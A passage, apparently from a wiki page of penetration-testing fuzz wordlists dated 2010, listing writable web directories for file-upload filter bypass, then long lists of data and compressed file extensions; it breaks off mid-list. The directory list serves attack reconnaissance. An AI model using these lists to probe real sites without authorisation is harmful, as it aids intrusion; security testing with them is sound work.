&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
